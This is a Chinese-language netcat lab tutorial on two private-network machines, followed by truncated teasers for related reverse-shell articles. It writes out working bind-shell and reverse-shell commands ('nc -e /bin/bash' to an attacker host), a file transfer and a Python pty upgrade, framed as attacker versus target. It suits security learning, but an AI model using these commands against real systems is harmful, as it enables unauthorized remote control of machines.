本文使用兩台電腦操作,一台是kali(192.168.0.23),一台是mac(192.168.0.24)
有些電腦不支援,而且跟機器使用順序還有關係。
比如我在kali上(192.168.0.23)輸入:
root@kali:~# nc -l 1234
在mac上(192.168.0.24)輸入:
➜ ~ nc 192.168.0.23 1234
結果是無法連線。
然而我調換了順序之後,就可以連線了,很神奇:
kali:
root@kali:~# nc 192.168.0.24 1234
asddsa
mac:
➜ ~ nc -l 1234
asddsa
同樣的,先在mac上輸入,回車後等待:
➜ desktop nc -l 1234 > file
.......
在kali上輸入:
root@kali:~/desktop# nc 192.168.0.24 1234 < dns
.........
回到mac,檢視file檔案,已經傳輸過來了:
➜ desktop cat file@*
0000
001002
kali上輸入:
root@kali:~# nc -lvvp 7777 -e /bin/bash
listening on [any] 7777 ...
mac上輸入:
➜ ~ nc 192.168.0.23 7777
回車之後kali上顯示連線成功:
root@kali:~# nc -lvvp 7777 -e /bin/bash
listening on [any] 7777 ...
192.168.0.24: inverse host lookup failed: unknown host
connect to [192.168.0.23] from (unknown) [192.168.0.24] 58773
此時mac上使用ls命令,列出kali上的檔案資訊:
➜ ~ nc 192.168.0.23 7777
ls52.cn_ips.txt
52.com.cn_ips.txt
desktop
documents
downloads
.....
首先在mac上輸入:
➜ ~ nc -l 7777
然後再kali上輸入:
root@kali:~# nc -e /bin/bash 192.168.0.24 7777
此時回到mac,輸入ls即可檢視kali上檔案目錄:
➜ ~ nc -l 7777
ls52.cn_ips.txt
52.com.cn_ips.txt
desktop
documents
downloads
所以正向彈shell是在靶機上監聽埠,然後攻擊者鏈結
反向彈shell是在攻擊者電腦上監聽埠,然後靶機鏈結
如果確定靶機上安裝了python,即可使用python生成乙個標準shell:
nc連線上靶機之後首先輸入:
python -c "import pty;pty.spawn('/bin/bash')"
使用ICMP協議反彈shell
icmpsh是乙個簡單的反向icmp shell,與其他類似 shell的工具相比,他的主要優勢在於它不需要管理許可權即可執行到目標計算機上,畢竟icmp協議誰都可以用。準備兩台虛擬機器 kali.2020 192.168.244.128 windows server 2008 192.168.13...
nc 管道符的一種反彈shell姿勢
shell的姿勢有很多,網上師傅們也有整理了各種文章,知識面有多廣,姿勢就有多猥瑣,我就目前常見的簡單說一下 bash nc php python telnet ruby等,具體的使用方法網上都有就不細說了,下面說個我遇到的認為不錯的 shell的方法,nc linux中的管道符 shell,嗯,據...
反彈shell集錦
就是控制端監聽在某tcp udp埠,被控端發起請求到該埠,並將其命令列的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本質上是網路概念的客戶端與服務端的角色反轉。通常用於被控端因防火牆受限 許可權不足 埠被占用等情形 假設我們攻擊了一台機器,開啟了該機器的...